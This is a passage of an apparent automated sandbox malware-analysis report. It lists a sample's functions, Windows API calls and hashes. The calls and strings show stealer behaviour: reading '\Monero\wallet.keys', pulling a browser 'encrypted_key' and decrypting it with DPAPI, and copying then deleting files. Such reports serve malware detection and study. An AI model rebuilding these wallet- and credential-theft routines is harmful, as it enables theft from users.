                              • Opcode ID: f2b8dec6bcf11f2a118d4a6f30438e199d183d09fa71d76d32611a427cffbed5
                              • Instruction ID: d65374cda95572452fb18306d07044a3a30412bf0eaec908aacc169aa68515ca
                              • Opcode Fuzzy Hash: f2b8dec6bcf11f2a118d4a6f30438e199d183d09fa71d76d32611a427cffbed5
                              • Instruction Fuzzy Hash: 8F210DB1A44608AFDB05DFD4DD49FBEBBB8FB48711F104119F609A7280C779A901CBA2
                              Function 001C8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001C951E,00000000), ref: 001C8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C8D62
                              • wsprintfW.USER32 ref: 001C8D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: ec2b625d204afab9528fc177a64fbc55eaf32fbfbf3010207008f5cc52071595
                              • Instruction ID: 77630d53c933c7bfe9da48d2ed61074297862ce76e4a4a098397756ba52aeb61
                              • Opcode Fuzzy Hash: ec2b625d204afab9528fc177a64fbc55eaf32fbfbf3010207008f5cc52071595
                              • Instruction Fuzzy Hash: 56E0ECB5A40208BFD711DBD4DD0AE697BBCEB48742F004195FD0D97280DAB19E14DB96
                              Function 001BA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001C8B60: GetSystemTime.KERNEL32(001D0E1A,00EE99A0,001D05AE,?,?,001B13F9,?,0000001A,001D0E1A,00000000,?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001C8B86
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001BA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 001BA3FF
                              • lstrlen.KERNEL32(00000000), ref: 001BA6BC
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 001BA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: b15252208693c4531724c09d659d15dc70efa25408e616d5ac8073f7037fb895
                              • Instruction ID: 6285b35b45a51c4276d1b5567eaa6c2c239afde46f11a7b925cf707a558e909c
                              • Opcode Fuzzy Hash: b15252208693c4531724c09d659d15dc70efa25408e616d5ac8073f7037fb895
                              • Instruction Fuzzy Hash: F7E1BC7281010C9BDB16EBA4DC96FEE7338AF34305F90815DF516B6091EF30AA49CB66
                              Function 001BD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001C8B60: GetSystemTime.KERNEL32(001D0E1A,00EE99A0,001D05AE,?,?,001B13F9,?,0000001A,001D0E1A,00000000,?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001C8B86
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001BD481
                              • lstrlen.KERNEL32(00000000), ref: 001BD698
                              • lstrlen.KERNEL32(00000000), ref: 001BD6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 001BD72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: c1d897208f1a263404c9ba0f86da54bf627dbf898c300fcb05e396d3b800c16e
                              • Instruction ID: e6f2cf629c12c38de39b1fb08821767d6e0221ef0503c20b97dd13b64f670016
                              • Opcode Fuzzy Hash: c1d897208f1a263404c9ba0f86da54bf627dbf898c300fcb05e396d3b800c16e
                              • Instruction Fuzzy Hash: FD91E17191010C9BDB16FBA4DD96FEE7338AF34309F90415DF506A6191EF34AA09CB62
                              Function 001BD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001C8B60: GetSystemTime.KERNEL32(001D0E1A,00EE99A0,001D05AE,?,?,001B13F9,?,0000001A,001D0E1A,00000000,?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001C8B86
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001BD801
                              • lstrlen.KERNEL32(00000000), ref: 001BD99F
                              • lstrlen.KERNEL32(00000000), ref: 001BD9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 001BDA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 42f90bcb50bc7814862a84014ab955d1c7e32ac91efc495eb6d37a504ee52c33
                              • Instruction ID: 45b9a19c436aaf2597bad99ff9c0e7e7109e9d93f9dbf94f82825a6a6c35d7c4
                              • Opcode Fuzzy Hash: 42f90bcb50bc7814862a84014ab955d1c7e32ac91efc495eb6d37a504ee52c33
                              • Instruction Fuzzy Hash: 9381B17191010C9BDB06FBA4DD96FEE7338AF74309F90451DF506A6191EF34AA09CBA2
                              Function 001C3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 04ae6ee93e01e3f73c96b960a16cc21f8890625005572699c464633634017852
                              • Instruction ID: 1a0035aca7a9fb88c66ab465b86bfa605fa3ff5b5afb749b82bd4d82fb2b8e2e
                              • Opcode Fuzzy Hash: 04ae6ee93e01e3f73c96b960a16cc21f8890625005572699c464633634017852
                              • Instruction Fuzzy Hash: EB412CB1D10209ABCB05EFA4D885FEEB778AF68704F50841DE41667290DB75EA05CFA2
                              Function 001B9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001B99EC
                                • Part of subcall function 001B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001B9A11
                                • Part of subcall function 001B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001B9A31
                                • Part of subcall function 001B99C0: ReadFile.KERNEL32(000000FF,?,00000000,001B148F,00000000), ref: 001B9A5A
                                • Part of subcall function 001B99C0: LocalFree.KERNEL32(001B148F), ref: 001B9A90
                                • Part of subcall function 001B99C0: CloseHandle.KERNEL32(000000FF), ref: 001B9A9A
                                • Part of subcall function 001C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001C8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 001B9D39
                                • Part of subcall function 001B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001B4EEE,00000000,00000000), ref: 001B9AEF
                                • Part of subcall function 001B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,001B4EEE,00000000,?), ref: 001B9B01
                                • Part of subcall function 001B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001B4EEE,00000000,00000000), ref: 001B9B2A
                                • Part of subcall function 001B9AC0: LocalFree.KERNEL32(?,?,?,?,001B4EEE,00000000,?), ref: 001B9B3F
                                • Part of subcall function 001B9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 001B9B84
                                • Part of subcall function 001B9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 001B9BA3
                                • Part of subcall function 001B9B60: LocalFree.KERNEL32(?), ref: 001B9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 86fbe809aef26fd4d82f20c9c95a4e42f98a0382e5bb7894b1f3933b73bc1810
                              • Instruction ID: d5bd6fa6120fff45f95a0c4c5adfc7c3418aa2ed05ce73cb3b8f3540ab9dcec0
                              • Opcode Fuzzy Hash: 86fbe809aef26fd4d82f20c9c95a4e42f98a0382e5bb7894b1f3933b73bc1810
                              • Instruction Fuzzy Hash: E6313EB6D10209ABCF14DFE4DC85EEFB7B8BF58304F544519EA05A7241EB319A05CBA1
                              Function 001C8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001D05B7), ref: 001C86CA
                              • Process32First.KERNEL32(?,00000128), ref: 001C86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 001C86F3
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • CloseHandle.KERNEL32(?), ref: 001C8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 43016553397d5df19e9f1454d956a77f7d28bdacef1d1db0b81bd66abdd0dacf
                              • Instruction ID: 0c00cdc082f6b7d5be1caf64184e14845214c8d9ea883585971dba80449527c0
                              • Opcode Fuzzy Hash: 43016553397d5df19e9f1454d956a77f7d28bdacef1d1db0b81bd66abdd0dacf
                              • Instruction Fuzzy Hash: F0318F71901218ABCB25DF90DC46FEEB778EF24704F50419DE109A21A0DB30AE44CFA1
                              Function 001C7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001D0E00,00000000,?), ref: 001C79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,001D0E00,00000000,?), ref: 001C79C4
                              • wsprintfA.USER32 ref: 001C79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 824488c10a54d9c407c4f05be2292ff32e689f003e23c208aeef67eeb1767046
                              • Instruction ID: dc49cc287d3d21a3d9a84d903e3a7bea256a238766e61ab60ecc73f682ff8a4b
                              • Opcode Fuzzy Hash: 824488c10a54d9c407c4f05be2292ff32e689f003e23c208aeef67eeb1767046
                              • Instruction Fuzzy Hash: C11118B2904518ABCB149FC9DD45BBEBBFCFB48B11F10411AF605A2280E3795940CBB1
                              Function 001C92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(001C3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,001C3AEE,?), ref: 001C92FC
                              • GetFileSizeEx.KERNEL32(000000FF,001C3AEE), ref: 001C9319
                              • CloseHandle.KERNEL32(000000FF), ref: 001C9327
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: b18d7a51aa5adc69ec130c7e41508126b2c2546c21dc55b348f79e92ea64474f
                              • Instruction ID: 3c6b4423ebbde4eadf1b8b1f17c79379d615687130b28166f8049f379ee8e5b5
                              • Opcode Fuzzy Hash: b18d7a51aa5adc69ec130c7e41508126b2c2546c21dc55b348f79e92ea64474f
                              • Instruction Fuzzy Hash: 35F01979E40208ABDB14DBF1DC49FAE77B9BB58710F118658A655AB2C0D774A6018F40
                              Function 001CC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 001CC74E
                                • Part of subcall function 001CBF9F: __amsg_exit.LIBCMT ref: 001CBFAF
                              • __getptd.LIBCMT ref: 001CC765
                              • __amsg_exit.LIBCMT ref: 001CC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 001CC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
